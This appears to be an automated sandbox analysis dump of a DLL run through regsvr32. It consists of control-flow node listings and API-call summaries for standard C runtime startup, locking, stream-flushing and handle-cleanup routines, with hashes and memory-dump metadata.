8588->8593 8594 6f954ee3 8593->8594 8596 6f954eea 8593->8596 8608 6f954cf1 GetLastError 8594->8608 8600 6f954ec6 8596->8600 8612 6f954cc8 8596->8612 8598 6f954f1f 8599 6f954f7d _Deallocate 11 API calls 8598->8599 8598->8600 8601 6f954f4f 8599->8601 8602 6f954c8c 8600->8602 8603 6f954c98 8602->8603 8605 6f954caf 8603->8605 8637 6f954d37 8603->8637 8606 6f954d37 ___std_exception_copy 39 API calls 8605->8606 8607 6f954cc2 8605->8607 8606->8607 8607->7869 8609 6f954d0a 8608->8609 8615 6f956769 8609->8615 8613 6f954cd3 GetLastError SetLastError 8612->8613 8614 6f954cec 8612->8614 8613->8598 8614->8598 8616 6f956782 8615->8616 8617 6f95677c 8615->8617 8618 6f9593f6 _unexpected 6 API calls 8616->8618 8623 6f954d22 SetLastError 8616->8623 8619 6f9593b7 _unexpected 6 API calls 8617->8619 8620 6f95679c 8618->8620 8619->8616 8621 6f9578b8 _unexpected 14 API calls 8620->8621 8620->8623 8622 6f9567ac 8621->8622 8624 6f9567b4 8622->8624 8625 6f9567c9 8622->8625 8623->8596 8626 6f9593f6 _unexpected 6 API calls 8624->8626 8627 6f9593f6 _unexpected 6 API calls 8625->8627 8628 6f9567c0 8626->8628 8629 6f9567d5 8627->8629 8633 6f956a8e ___free_lconv_mon 14 API calls 8628->8633 8630 6f9567d9 8629->8630 8631 6f9567e8 8629->8631 8634 6f9593f6 _unexpected 6 API calls 8630->8634 8632 6f956369 _unexpected 14 API calls 8631->8632 8635 6f9567f3 8632->8635 8633->8623 8634->8628 8636 6f956a8e ___free_lconv_mon 14 API calls 8635->8636 8636->8623 8638 6f954d41 8637->8638 8639 6f954d4a 8637->8639 8640 6f954cf1 ___std_exception_copy 16 API calls 8638->8640 8639->8605 8641 6f954d46 8640->8641 8641->8639 8642 6f95609a __FrameHandler3::FrameUnwindToState 39 API calls 8641->8642 8643 6f954d53 8642->8643 8877 6f951d2a 8878 6f951d35 8877->8878 8879 6f951d68 8877->8879 8881 6f951d5a 8878->8881 8882 6f951d3a 8878->8882 8916 6f951e84 8879->8916 8889 6f951d7d 8881->8889 8883 6f951d50 8882->8883 8884 6f951d3f 8882->8884 8908 6f95237c 8883->8908 8888 6f951d44 8884->8888 8903 6f95239b 8884->8903 8890 6f951d89 
__FrameHandler3::FrameUnwindToState 8889->8890 8939 6f95240c 8890->8939 8892 6f951d90 __DllMainCRTStartup@12 8893 6f951db7 8892->8893 8894 6f951e7c 8892->8894 8900 6f951df3 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState 8892->8900 8950 6f95236e 8893->8950 8958 6f9525ab IsProcessorFeaturePresent 8894->8958 8897 6f951e83 8898 6f951dc6 __RTC_Initialize 8898->8900 8953 6f95228c InitializeSListHead 8898->8953 8900->8888 8901 6f951dd4 8901->8900 8954 6f952343 8901->8954 9105 6f955fba 8903->9105 9194 6f9531ec 8908->9194 8911 6f952385 8911->8888 8914 6f952398 8914->8888 8915 6f9531f7 21 API calls 8915->8911 8918 6f951e90 __FrameHandler3::FrameUnwindToState __DllMainCRTStartup@12 8916->8918 8917 6f951e99 8917->8888 8918->8917 8919 6f951ec1 8918->8919 8920 6f951f2c 8918->8920 9214 6f9523dc 8919->9214 8921 6f9525ab __DllMainCRTStartup@12 4 API calls 8920->8921 8925 6f951f33 __FrameHandler3::FrameUnwindToState 8921->8925 8923 6f951ec6 9223 6f952298 8923->9223 8926 6f951f69 dllmain_raw 8925->8926 8935 6f951f64 __DllMainCRTStartup@12 8925->8935 8936 6f951f4f 8925->8936 8928 6f951f83 dllmain_crt_dispatch 8926->8928 8926->8936 8927 6f951ecb __RTC_Initialize __DllMainCRTStartup@12 9226 6f95257d 8927->9226 8928->8935 8928->8936 8932 6f951fd5 8933 6f951fde dllmain_crt_dispatch 8932->8933 8932->8936 8934 6f951ff1 dllmain_raw 8933->8934 8933->8936 8934->8936 8935->8932 8937 6f951e84 __DllMainCRTStartup@12 81 API calls 8935->8937 8936->8888 8938 6f951fca dllmain_raw 8937->8938 8938->8932 8940 6f952415 8939->8940 8962 6f952778 IsProcessorFeaturePresent 8940->8962 8944 6f952426 8945 6f95242a 8944->8945 8972 6f955f9d 8944->8972 8945->8892 8948 6f952441 8948->8892 9099 6f952445 8950->9099 8952 6f952375 8952->8898 8953->8901 8955 6f952348 ___scrt_release_startup_lock 8954->8955 8956 6f952778 IsProcessorFeaturePresent 8955->8956 8957 6f952351 8955->8957 8956->8957 8957->8900 8959 6f9525c1 __FrameHandler3::FrameUnwindToState 8958->8959 8960 6f95266c 
IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8959->8960 8961 6f9526b7 __FrameHandler3::FrameUnwindToState 8960->8961 8961->8897 8963 6f952421 8962->8963 8964 6f9531cd 8963->8964 8981 6f953807 8964->8981 8968 6f9531de 8969 6f9531e9 8968->8969 8995 6f953843 8968->8995 8969->8944 8971 6f9531d6 8971->8944 9037 6f959768 8972->9037 8975 6f953202 8976 6f953215 8975->8976 8977 6f95320b 8975->8977 8976->8945 8978 6f9537ec ___vcrt_uninitialize_ptd 6 API calls 8977->8978 8979 6f953210 8978->8979 8980 6f953843 ___vcrt_uninitialize_locks DeleteCriticalSection 8979->8980 8980->8976 8982 6f953810 8981->8982 8984 6f953839 8982->8984 8985 6f9531d2 8982->8985 8999 6f953e3b 8982->8999 8986 6f953843 ___vcrt_uninitialize_locks DeleteCriticalSection 8984->8986 8985->8971 8987 6f9537b9 8985->8987 8986->8985 9018 6f953d4c 8987->9018 8990 6f9537ce 8990->8968 8993 6f9537e9 8993->8968 8996 6f95384e 8995->8996 8998 6f95386d 8995->8998 8997 6f953858 DeleteCriticalSection 8996->8997 8997->8997 8997->8998 8998->8971 9004 6f953d03 8999->9004 9002 6f953e73 InitializeCriticalSectionAndSpinCount 9003 6f953e5e 9002->9003 9003->8982 9005 6f953d3e 9004->9005 9006 6f953d1b 9004->9006 9005->9002 9005->9003 9006->9005 9010 6f953c69 9006->9010 9009 6f953d30 GetProcAddress 9009->9005 9011 6f953c75 9010->9011 9012 6f953ce9 9011->9012 9013 6f953c8b LoadLibraryExW 9011->9013 9017 6f953ccb LoadLibraryExW 9011->9017 9012->9005 9012->9009 9014 6f953cf0 9013->9014 9015 6f953ca9 GetLastError 9013->9015 9014->9012 9016 6f953cf8 FreeLibrary 9014->9016 9015->9011 9016->9012 9017->9011 9017->9014 9019 6f953d03 ___vcrt_FlsSetValue 5 API calls 9018->9019 9020 6f953d66 9019->9020 9021 6f953d7f TlsAlloc 9020->9021 9022 6f9537c3 9020->9022 9022->8990 9023 6f953dfd 9022->9023 9024 6f953d03 ___vcrt_FlsSetValue 5 API calls 9023->9024 9025 6f953e17 9024->9025 9026 6f953e32 TlsSetValue 9025->9026 9027 6f9537dc 9025->9027 9026->9027 9027->8993 9028 6f9537ec 9027->9028 9029 6f9537fc 9028->9029 9030 
6f9537f6 9028->9030 9029->8990 9032 6f953d87 9030->9032 9033 6f953d03 ___vcrt_FlsSetValue 5 API calls 9032->9033 9034 6f953da1 9033->9034 9035 6f953dad 9034->9035 9036 6f953db9 TlsFree 9034->9036 9035->9029 9036->9035 9038 6f959778 9037->9038 9039 6f952433 9037->9039 9038->9039 9041 6f9596dc 9038->9041 9039->8948 9039->8975 9042 6f9596e8 __FrameHandler3::FrameUnwindToState 9041->9042 9053 6f956933 EnterCriticalSection 9042->9053 9044 6f9596ef 9054 6f95baf8 9044->9054 9047 6f95970d 9078 6f959733 9047->9078 9053->9044 9055 6f95bb04 __FrameHandler3::FrameUnwindToState 9054->9055 9056 6f95bb0d 9055->9056 9057 6f95bb2e 9055->9057 9058 6f956a7b __dosmaperr 14 API calls 9056->9058 9081 6f956933 EnterCriticalSection 9057->9081 9060 6f95bb12 9058->9060 9061 6f954f50 ___std_exception_copy 39 API calls 9060->9061 9062 6f9596fe 9061->9062 9062->9047 9067 6f959576 GetStartupInfoW 9062->9067 9063 6f95bb66 9089 6f95bb8d 9063->9089 9064 6f95bb3a 9064->9063 9082 6f95ba48 9064->9082 9068 6f959593 9067->9068 9070 6f959627 9067->9070 9069 6f95baf8 40 API calls 9068->9069 9068->9070 9071 6f9595bb 9069->9071 9073 6f95962c 9070->9073 9071->9070 9072 6f9595eb GetFileType 9071->9072 9072->9071 9074 6f959633 9073->9074 9075 6f959676 GetStdHandle 9074->9075 9076 6f9596d8 9074->9076 9077 6f959689 GetFileType 9074->9077 9075->9074 9076->9047 9077->9074 9098 6f95697b LeaveCriticalSection 9078->9098 9080 6f95971e 9080->9038 9081->9064 9083 6f9578b8 _unexpected 14 API calls 9082->9083 9086 6f95ba5a 9083->9086 9084 6f95ba67 9085 6f956a8e ___free_lconv_mon 14 API calls 9084->9085 9088 6f95babc 9085->9088 9086->9084 9092 6f959438 9086->9092 9088->9064 9097 6f95697b LeaveCriticalSection 9089->9097 9091 6f95bb94 9091->9062 9093 6f9591f8 _unexpected 5 API calls 9092->9093 9094 6f959454 9093->9094 9095 6f959472 InitializeCriticalSectionAndSpinCount 9094->9095 9096 6f95945d 9094->9096 9095->9096 9096->9086 9097->9091 9098->9080 9100 6f952451 9099->9100 9101 6f952455 9099->9101 9100->8952 9102 6f9525ab 
__DllMainCRTStartup@12 4 API calls 9101->9102 9104 6f952462 ___scrt_release_startup_lock 9101->9104 9103 6f9524cb 9102->9103 9104->8952 9111 6f95653b 9105->9111 9108 6f9531f7 9177 6f9536e3 9108->9177 9112 6f956545 9111->9112 9113 6f9523a0 9111->9113 9114 6f9593b7 _unexpected 6 API calls 9112->9114 9113->9108 9115 6f95654c 9114->9115 9115->9113 9116 6f9593f6 _unexpected 6 API calls 9115->9116 9117 6f95655f 9116->9117 9119 6f956402 9117->9119 9120 6f95640d 9119->9120 9121 6f95641d 9119->9121 9125 6f956423 9120->9125 9121->9113 9124 6f956a8e ___free_lconv_mon 14 API calls 9124->9121 9126 6f95643e 9125->9126 9127 6f956438 9125->9127 9129 6f956a8e ___free_lconv_mon 14 API calls 9126->9129 9128 6f956a8e ___free_lconv_mon 14 API calls 9127->9128 9128->9126 9130 6f95644a 9129->9130 9131 6f956a8e ___free_lconv_mon 14 API calls 9130->9131 9132 6f956455 9131->9132 9133 6f956a8e ___free_lconv_mon 14 API calls 9132->9133 9134 6f956460 9133->9134 9135 6f956a8e ___free_lconv_mon 14 API calls 9134->9135 9136 6f95646b 9135->9136 9137 6f956a8e ___free_lconv_mon 14 API calls 9136->9137 9138 6f956476 9137->9138 9139 6f956a8e ___free_lconv_mon 14 API calls 9138->9139 9140 6f956481 9139->9140 9141 6f956a8e ___free_lconv_mon 14 API calls 9140->9141 9142 6f95648c 9141->9142 9143 6f956a8e ___free_lconv_mon 14 API calls 9142->9143 9144 6f956497 9143->9144 9145 6f956a8e ___free_lconv_mon 14 API calls 9144->9145 9146 6f9564a5 9145->9146 9151 6f95624f 9146->9151 9152 6f95625b __FrameHandler3::FrameUnwindToState 9151->9152 9167 6f956933 EnterCriticalSection 9152->9167 9154 6f95628f 9168 6f9562ae 9154->9168 9156 6f956265 9156->9154 9158 6f956a8e ___free_lconv_mon 14 API calls 9156->9158 9158->9154 9159 6f9562ba 9160 6f9562c6 __FrameHandler3::FrameUnwindToState 9159->9160 9172 6f956933 EnterCriticalSection 9160->9172 9162 6f9562d0 9163 6f9564f0 _unexpected 14 API calls 9162->9163 9164 6f9562e3 9163->9164 9173 6f956303 9164->9173 9167->9156 9171 6f95697b LeaveCriticalSection 9168->9171 9170 
6f95629c 9170->9159 9171->9170 9172->9162 9176 6f95697b LeaveCriticalSection 9173->9176 9175 6f9562f1 9175->9124 9176->9175 9178 6f9536f0 9177->9178 9184 6f9523a5 9177->9184 9179 6f9536fe 9178->9179 9185 6f953dc2 9178->9185 9180 6f953dfd ___vcrt_FlsSetValue 6 API calls 9179->9180 9182 6f95370e 9180->9182 9190 6f9536c7 9182->9190 9184->8888 9186 6f953d03 ___vcrt_FlsSetValue 5 API calls 9185->9186 9187 6f953ddc 9186->9187 9188 6f953df4 TlsGetValue 9187->9188 9189 6f953de8 9187->9189 9188->9189 9189->9179 9191 6f9536d1 9190->9191 9192 6f9536de 9190->9192 9191->9192 9193 6f9555ad ___std_exception_copy 14 API calls 9191->9193 9192->9184 9193->9192 9200 6f953727 9194->9200 9196 6f952381 9196->8911 9197 6f955faf 9196->9197 9198 6f9566b8 __dosmaperr 14 API calls 9197->9198 9199 6f95238d 9198->9199 9199->8914 9199->8915 9201 6f953730 9200->9201 9202 6f953733 GetLastError 9200->9202 9201->9196 9203 6f953dc2 ___vcrt_FlsGetValue 6 API calls 9202->9203 9204 6f953748 9203->9204 9205 6f953767 9204->9205 9206 6f9537ad SetLastError 9204->9206 9207 6f953dfd ___vcrt_FlsSetValue 6 API calls 9204->9207 9205->9206 9206->9196 9208 6f953761 __FrameHandler3::FrameUnwindToState 9207->9208 9208->9205 9209 6f953789 9208->9209 9210 6f953dfd ___vcrt_FlsSetValue 6 API calls 9208->9210 9211 6f953dfd ___vcrt_FlsSetValue 6 API calls 9209->9211 9212 6f95379d 9209->9212 9210->9209 9211->9212 9213 6f9555ad ___std_exception_copy 14 API calls 9212->9213 9213->9205 9215 6f9523e1 ___scrt_release_startup_lock 9214->9215 9216 6f9523e5 9215->9216 9219 6f9523f1 __DllMainCRTStartup@12 9215->9219 9217 6f955e19 __DllMainCRTStartup@12 14 API calls 9216->9217 9218 6f9523ef 9217->9218 9218->8923 9220 6f9523fe 9219->9220 9221 6f95519b __FrameHandler3::FrameUnwindToState 21 API calls 9219->9221 9220->8923 9222 6f95535a 9221->9222 9222->8923 9235 6f9531aa InterlockedFlushSList 9223->9235 9227 6f952589 9226->9227 9228 6f951eea 9227->9228 9239 6f955fc2 9227->9239 9232 6f951f26 9228->9232 9230 6f952597 9231 6f953202 
___scrt_uninitialize_crt 7 API calls 9230->9231 9231->9228 9337 6f9523ff 9232->9337 9236 6f9522a2 9235->9236 9237 6f9531ba 9235->9237 9236->8927 9237->9236 9238 6f9555ad ___std_exception_copy 14 API calls 9237->9238 9238->9237 9240 6f955fcd 9239->9240 9241 6f955fdf ___scrt_uninitialize_crt 9239->9241 9242 6f955fdb 9240->9242 9244 6f959e13 9240->9244 9241->9230 9242->9230 9247 6f959ca4 9244->9247 9250 6f959bf8 9247->9250 9251 6f959c04 __FrameHandler3::FrameUnwindToState 9250->9251 9258 6f956933 EnterCriticalSection 9251->9258 9253 6f959c7a 9267 6f959c98 9253->9267 9254 6f959c0e ___scrt_uninitialize_crt 9254->9253 9259 6f959b6c 9254->9259 9258->9254 9260 6f959b78 __FrameHandler3::FrameUnwindToState 9259->9260 9270 6f959f30 EnterCriticalSection 9260->9270 9262 6f959b82 ___scrt_uninitialize_crt 9263 6f959bbb 9262->9263 9271 6f959dae 9262->9271 9284 6f959bec 9263->9284 9336 6f95697b LeaveCriticalSection 9267->9336 9269 6f959c86 9269->9242 9270->9262 9272 6f959dc3 ___std_exception_copy 9271->9272 9273 6f959dd5 9272->9273 9274 6f959dca 9272->9274 9287 6f959d45 9273->9287 9275 6f959ca4 ___scrt_uninitialize_crt 68 API calls 9274->9275 9283 6f959dd0 9275->9283 9278 6f954c8c ___std_exception_copy 39 API calls 9280 6f959e0d 9278->9280 9280->9263 9281 6f959df6 9300 6f95bd79 9281->9300 9283->9278 9335 6f959f44 LeaveCriticalSection 9284->9335 9286 6f959bda 9286->9254 9288 6f959d5e 9287->9288 9289 6f959d85 9287->9289 9288->9289 9290 6f95a149 ___scrt_uninitialize_crt 39 API calls 9288->9290 9289->9283 9293 6f95a149 9289->9293 9291 6f959d7a 9290->9291 9311 6f95c598 9291->9311 9294 6f95a155 9293->9294 9295 6f95a16a 9293->9295 9296 6f956a7b __dosmaperr 14 API calls 9294->9296 9295->9281 9297 6f95a15a 9296->9297 9298 6f954f50 ___std_exception_copy 39 API calls 9297->9298 9299 6f95a165 9298->9299 9299->9281 9301 6f95bd97 9300->9301 9302 6f95bd8a 9300->9302 9304 6f95bde0 9301->9304 9307 6f95bdbe 9301->9307 9303 6f956a7b __dosmaperr 14 API calls 9302->9303 9306 6f95bd8f 9303->9306 9305 
6f956a7b __dosmaperr 14 API calls 9304->9305 9308 6f95bde5 9305->9308 9306->9283 9322 6f95bcd7 9307->9322 9309 6f954f50 ___std_exception_copy 39 API calls 9308->9309 9309->9306 9313 6f95c5a4 __FrameHandler3::FrameUnwindToState 9311->9313 9312 6f95c5e5 9314 6f954ed3 ___std_exception_copy 29 API calls 9312->9314 9313->9312 9315 6f95c62b 9313->9315 9321 6f95c5ac 9313->9321 9314->9321 9316 6f95bb96 ___scrt_uninitialize_crt EnterCriticalSection 9315->9316 9317 6f95c631 9316->9317 9318 6f95c64f 9317->9318 9319 6f95c6a9 ___scrt_uninitialize_crt 62 API calls 9317->9319 9320 6f95c6a1 ___scrt_uninitialize_crt LeaveCriticalSection 9318->9320 9319->9318 9320->9321 9321->9289 9323 6f95bce3 __FrameHandler3::FrameUnwindToState 9322->9323 9324 6f95bb96 ___scrt_uninitialize_crt EnterCriticalSection 9323->9324 9325 6f95bcf2 9324->9325 9326 6f95bc6d ___scrt_uninitialize_crt 39 API calls 9325->9326 9334 6f95bd37 9325->9334 9328 6f95bd1e FlushFileBuffers 9326->9328 9327 6f956a7b __dosmaperr 14 API calls 9329 6f95bd3e 9327->9329 9328->9329 9330 6f95bd2a GetLastError 9328->9330 9332 6f95bd6d ___scrt_uninitialize_crt LeaveCriticalSection 9329->9332 9331 6f956a68 __dosmaperr 14 API calls 9330->9331 9331->9334 9333 6f95bd56 9332->9333 9333->9306 9334->9327 9335->9286 9336->9269 9342 6f955ff2 9337->9342 9340 6f9537ec ___vcrt_uninitialize_ptd 6 API calls 9341 6f951f2b 9340->9341 9341->8917 9345 6f956838 9342->9345 9346 6f956842 9345->9346 9347 6f952406 9345->9347 9349 6f959378 9346->9349 9347->9340 9350 6f9591f8 _unexpected 5 API calls 9349->9350 9351 6f959394 9350->9351 9352 6f95939d 9351->9352 9353 6f9593af TlsFree 9351->9353 9352->9347 9953 6f9568cb 9956 6f956852 9953->9956 9957 6f95685e __FrameHandler3::FrameUnwindToState 9956->9957 9964 6f956933 EnterCriticalSection 9957->9964 9959 6f956868 9960 6f956896 9959->9960 9962 6f95a4ba ___scrt_uninitialize_crt 14 API calls 9959->9962 9965 6f9568b4 9960->9965 9962->9959 9964->9959 9968 6f95697b LeaveCriticalSection 9965->9968 9967 6f9568a2 
9968->9967 10178 6f959ee4 10179 6f959e13 ___scrt_uninitialize_crt 68 API calls 10178->10179 10180 6f959eec 10179->10180 10188 6f95c8c5 10180->10188 10182 6f959ef1 10198 6f95c970 10182->10198 10185 6f959f1b 10186 6f956a8e ___free_lconv_mon 14 API calls 10185->10186 10187 6f959f26 10186->10187 10189 6f95c8d1 __FrameHandler3::FrameUnwindToState 10188->10189 10202 6f956933 EnterCriticalSection 10189->10202 10191 6f95c948 10209 6f95c967 10191->10209 10193 6f95c8dc 10193->10191 10195 6f95c91c DeleteCriticalSection 10193->10195 10203 6f95d210 10193->10203 10197 6f956a8e ___free_lconv_mon 14 API calls 10195->10197 10197->10193 10199 6f95c987 10198->10199 10200 6f959f00 DeleteCriticalSection 10198->10200 10199->10200 10201 6f956a8e ___free_lconv_mon 14 API calls 10199->10201 10200->10182 10200->10185 10201->10200 10202->10193 10204 6f95d223 ___std_exception_copy 10203->10204 10212 6f95d0eb 10204->10212 10206 6f95d22f 10207 6f954c8c ___std_exception_copy 39 API calls 10206->10207 10208 6f95d23b 10207->10208 10208->10193 10297 6f95697b LeaveCriticalSection 10209->10297 10211 6f95c954 10211->10182 10213 6f95d0f7 __FrameHandler3::FrameUnwindToState 10212->10213 10214 6f95d124 10213->10214 10215 6f95d101 10213->10215 10222 6f95d11c 10214->10222 10223 6f959f30 EnterCriticalSection 10214->10223 10216 6f954ed3 ___std_exception_copy 29 API calls 10215->10216 10216->10222 10218 6f95d142 10224 6f95d182 10218->10224 10220 6f95d14f 10238 6f95d17a 10220->10238 10222->10206 10223->10218 10225 6f95d1b2 10224->10225 10226 6f95d18f 10224->10226 10228 6f95d1aa 10225->10228 10229 6f959d45 ___scrt_uninitialize_crt 64 API calls 10225->10229 10227 6f954ed3 ___std_exception_copy 29 API calls 10226->10227 10227->10228 10228->10220 10230 6f95d1ca 10229->10230 10231 6f95c970 14 API calls 10230->10231 10232 6f95d1d2 10231->10232 10233 6f95a149 ___scrt_uninitialize_crt 39 API calls 10232->10233 10234 6f95d1de 10233->10234 10241 6f95d9fc 10234->10241 10237 6f956a8e ___free_lconv_mon 14 API calls 
10237->10228 10296 6f959f44 LeaveCriticalSection 10238->10296 10240 6f95d180 10240->10222 10243 6f95d1e5 10241->10243 10244 6f95da25 10241->10244 10242 6f95da74 10245 6f954ed3 ___std_exception_copy 29 API calls 10242->10245 10243->10228 10243->10237 10244->10242 10246 6f95da4c 10244->10246 10245->10243 10248 6f95d96b 10246->10248 10249 6f95d977 __FrameHandler3::FrameUnwindToState 10248->10249 10256 6f95bb96 EnterCriticalSection 10249->10256 10251 6f95d985 10253 6f95d9b6 10251->10253 10257 6f95da9f 10251->10257 10270 6f95d9f0 10253->10270 10256->10251 10273 6f95bc6d 10257->10273 10259 6f95dab5 10286 6f95bbdc 10259->10286 10261 6f95daaf 10261->10259 10263 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10261->10263 10269 6f95dae7 10261->10269 10262 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10264 6f95daf3 CloseHandle 10262->10264 10266 6f95dade 10263->10266 10264->10259 10268 6f95daff GetLastError 10264->10268 10265 6f95db0d ___scrt_uninitialize_crt 10265->10253 10267 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10266->10267 10267->10269 10268->10259 10269->10259 10269->10262 10295 6f95bbb9 LeaveCriticalSection 10270->10295 10272 6f95d9d9 10272->10243 10274 6f95bc7a 10273->10274 10276 6f95bc8f 10273->10276 10275 6f956a68 __dosmaperr 14 API calls 10274->10275 10277 6f95bc7f 10275->10277 10278 6f956a68 __dosmaperr 14 API calls 10276->10278 10280 6f95bcb4 10276->10280 10279 6f956a7b __dosmaperr 14 API calls 10277->10279 10281 6f95bcbf 10278->10281 10282 6f95bc87 10279->10282 10280->10261 10283 6f956a7b __dosmaperr 14 API calls 10281->10283 10282->10261 10284 6f95bcc7 10283->10284 10285 6f954f50 ___std_exception_copy 39 API calls 10284->10285 10285->10282 10287 6f95bc52 10286->10287 10288 6f95bbeb 10286->10288 10289 6f956a7b __dosmaperr 14 API calls 10287->10289 10288->10287 10294 6f95bc15 10288->10294 10290 6f95bc57 10289->10290 10291 6f956a68 __dosmaperr 14 API calls 10290->10291 10292 6f95bc42 10291->10292 10292->10265 10293 6f95bc3c SetStdHandle 10293->10292 
10294->10292 10294->10293 10295->10272 10296->10240 10297->10211 9354 6f95206a 9355 6f952073 9354->9355 9356 6f952078 9354->9356 9371 6f95223b 9355->9371 9360 6f951f34 9356->9360 9361 6f951f40 __FrameHandler3::FrameUnwindToState 9360->9361 9362 6f951f69 dllmain_raw 9361->9362 9367 6f951f64 __DllMainCRTStartup@12 9361->9367 9368 6f951f4f 9361->9368 9363 6f951f83 dllmain_crt_dispatch 9362->9363 9362->9368 9363->9367 9363->9368 9364 6f951fd5 9365 6f951fde dllmain_crt_dispatch 9364->9365 9364->9368 9366 6f951ff1 dllmain_raw 9365->9366 9365->9368 9366->9368 9367->9364 9369 6f951e84 __DllMainCRTStartup@12 86 API calls 9367->9369 9370 6f951fca dllmain_raw 9369->9370 9370->9364 9372 6f952251 9371->9372 9374 6f95225a 9372->9374 9375 6f9521ee GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9372->9375 9374->9356 9375->9374

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 6F956A8E: HeapFree.KERNEL32(00000000,00000000,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AA4
                                                                                                  • Part of subcall function 6F956A8E: GetLastError.KERNEL32(?,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AAF
                                                                                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F956FDC
                                                                                                • GetExitCodeProcess.KERNELBASE(?,?), ref: 6F956FE9
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F956FFE
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957009
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957014
                                                                                                • __dosmaperr.LIBCMT ref: 6F95701B
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957026
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957031
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957043
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F95704E
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F95707F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2764183375-0
                                                                                                • Opcode ID: d5ae05d5f146bc4ca3e0d0321ca3818495068bc107bf2a68a8105dab6195e736
                                                                                                • Instruction ID: a321e98985f0f9d9a18d7ef8a04501a5f8a3b317096c4e47111c4bc96319f699
                                                                                                • Opcode Fuzzy Hash: d5ae05d5f146bc4ca3e0d0321ca3818495068bc107bf2a68a8105dab6195e736
                                                                                                • Instruction Fuzzy Hash: 49515B7190020CEBEF12DFA4C984AEE7BB9EF46315F108166E910A61D1D731DA78DF62

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __RTC_Initialize.LIBCMT ref: 6F951ECB
                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6F951EE5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                • String ID:
                                                                                                • API String ID: 2442719207-0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • _strrchr.LIBCMT ref: 6F956CF9
                                                                                                • _strrchr.LIBCMT ref: 6F956D03
                                                                                                • _strrchr.LIBCMT ref: 6F956D18
                                                                                                  • Part of subcall function 6F956A8E: HeapFree.KERNEL32(00000000,00000000,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AA4
                                                                                                  • Part of subcall function 6F956A8E: GetLastError.KERNEL32(?,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AAF
                                                                                                  • Part of subcall function 6F954F7D: IsProcessorFeaturePresent.KERNEL32(00000017,6F954F4F,?,00000000,00000000,00000000,00000000,?,00000000,?,6F954EC6,?,00000000,00000000,00000000,00000000), ref: 6F954F7F
                                                                                                  • Part of subcall function 6F954F7D: GetCurrentProcess.KERNEL32(C0000417,00000000,?,00000000,?,?,6F954F6F,00000000,00000000,00000000,00000000,00000000,?,6F951118), ref: 6F954FA2
                                                                                                  • Part of subcall function 6F954F7D: TerminateProcess.KERNEL32(00000000,?,?,6F954F6F,00000000,00000000,00000000,00000000,00000000,?,6F951118), ref: 6F954FA9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: _strrchr$Process$CurrentErrorFeatureFreeHeapLastPresentProcessorTerminate
                                                                                                • String ID: .com
                                                                                                • API String ID: 3694955208-4200470757

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
